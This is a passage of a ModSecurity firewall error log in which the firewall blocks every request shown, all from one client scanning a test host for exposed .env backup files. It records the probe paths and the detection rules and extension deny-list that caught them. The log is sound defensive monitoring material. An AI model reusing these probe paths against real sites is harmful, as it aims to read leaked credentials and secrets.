[Fri Jan 16 03:21:37.949739 2026] [:error] [pid 1444034] [client 45.148.10.246:50170] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgseRfEYyDES-ZFL4ixQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//.env.local.backup
[Fri Jan 16 03:21:38.065087 2026] [:error] [pid 1444032] [client 45.148.10.246:50172] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsukMvq8uPO2ZciWrXAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.backup
[Fri Jan 16 03:21:38.065345 2026] [:error] [pid 1444032] [client 45.148.10.246:50172] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsukMvq8uPO2ZciWrXAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.backup
[Fri Jan 16 03:21:38.065573 2026] [:error] [pid 1444032] [client 45.148.10.246:50172] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsukMvq8uPO2ZciWrXAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.backup
[Fri Jan 16 03:21:38.065737 2026] [:error] [pid 1444032] [client 45.148.10.246:50172] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "aWmgsukMvq8uPO2ZciWrXAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.backup
[Fri Jan 16 03:21:38.187830 2026] [:error] [pid 1444040] [client 45.148.10.246:50182] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsvn_5sIyKhJ5GAza7gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup
[Fri Jan 16 03:21:38.187976 2026] [:error] [pid 1444040] [client 45.148.10.246:50182] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsvn_5sIyKhJ5GAza7gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup
[Fri Jan 16 03:21:38.188189 2026] [:error] [pid 1444040] [client 45.148.10.246:50182] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsvn_5sIyKhJ5GAza7gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup
[Fri Jan 16 03:21:38.188395 2026] [:error] [pid 1444040] [client 45.148.10.246:50182] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsvn_5sIyKhJ5GAza7gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup
[Fri Jan 16 03:21:38.348204 2026] [:error] [pid 1444031] [client 45.148.10.246:50186] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup/"] [unique_id "aWmgsn-9MmrgwjmYTAJT4QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup/
[Fri Jan 16 03:21:38.348437 2026] [:error] [pid 1444031] [client 45.148.10.246:50186] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup/"] [unique_id "aWmgsn-9MmrgwjmYTAJT4QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup/
[Fri Jan 16 03:21:38.348607 2026] [:error] [pid 1444031] [client 45.148.10.246:50186] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup/"] [unique_id "aWmgsn-9MmrgwjmYTAJT4QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.dev.backup/
[Fri Jan 16 03:21:38.501256 2026] [:error] [pid 1444035] [client 45.148.10.246:50188] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsrauW6yeGWXfDeFYiAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev.backup
[Fri Jan 16 03:21:38.501411 2026] [:error] [pid 1444035] [client 45.148.10.246:50188] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsrauW6yeGWXfDeFYiAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev.backup
[Fri Jan 16 03:21:38.501646 2026] [:error] [pid 1444035] [client 45.148.10.246:50188] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsrauW6yeGWXfDeFYiAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev.backup
[Fri Jan 16 03:21:38.501811 2026] [:error] [pid 1444035] [client 45.148.10.246:50188] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgsrauW6yeGWXfDeFYiAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.dev.backup
[Fri Jan 16 03:21:38.626142 2026] [:error] [pid 1444033] [client 45.148.10.246:50198] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgstLJkp65ULFQ2YYjNgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev.backup
[Fri Jan 16 03:21:38.626282 2026] [:error] [pid 1444033] [client 45.148.10.246:50198] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgstLJkp65ULFQ2YYjNgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev.backup
[Fri Jan 16 03:21:38.626520 2026] [:error] [pid 1444033] [client 45.148.10.246:50198] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgstLJkp65ULFQ2YYjNgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev.backup
[Fri Jan 16 03:21:38.626691 2026] [:error] [pid 1444033] [client 45.148.10.246:50198] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.backup"] [unique_id "aWmgstLJkp65ULFQ2YYjNgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./.env.dev.backup
[Fri Jan 16 03:21:38.755510 2026] [:error] [pid 1444034] [client 45.148.10.246:50202] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgsuRfEYyDES-ZFL4ixgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup
[Fri Jan 16 03:21:38.755653 2026] [:error] [pid 1444034] [client 45.148.10.246:50202] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgsuRfEYyDES-ZFL4ixgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup
[Fri Jan 16 03:21:38.755913 2026] [:error] [pid 1444034] [client 45.148.10.246:50202] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgsuRfEYyDES-ZFL4ixgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup
[Fri Jan 16 03:21:38.756068 2026] [:error] [pid 1444034] [client 45.148.10.246:50202] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgsuRfEYyDES-ZFL4ixgAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup
[Fri Jan 16 03:21:38.904218 2026] [:error] [pid 1444032] [client 45.148.10.246:50212] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.backup/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup/"] [unique_id "aWmgsukMvq8uPO2ZciWrXQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup/
[Fri Jan 16 03:21:38.904447 2026] [:error] [pid 1444032] [client 45.148.10.246:50212] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup/"] [unique_id "aWmgsukMvq8uPO2ZciWrXQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup/
[Fri Jan 16 03:21:38.904604 2026] [:error] [pid 1444032] [client 45.148.10.246:50212] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup/"] [unique_id "aWmgsukMvq8uPO2ZciWrXQAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.test.backup/
[Fri Jan 16 03:21:39.050134 2026] [:error] [pid 1444040] [client 45.148.10.246:50216] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs_n_5sIyKhJ5GAza7wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.test.backup
[Fri Jan 16 03:21:39.051158 2026] [:error] [pid 1444040] [client 45.148.10.246:50216] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs_n_5sIyKhJ5GAza7wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.test.backup
[Fri Jan 16 03:21:39.051449 2026] [:error] [pid 1444040] [client 45.148.10.246:50216] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs_n_5sIyKhJ5GAza7wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.test.backup
[Fri Jan 16 03:21:39.051630 2026] [:error] [pid 1444040] [client 45.148.10.246:50216] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs_n_5sIyKhJ5GAza7wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//.env.test.backup
[Fri Jan 16 03:21:39.182359 2026] [:error] [pid 1444031] [client 45.148.10.246:50220] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag 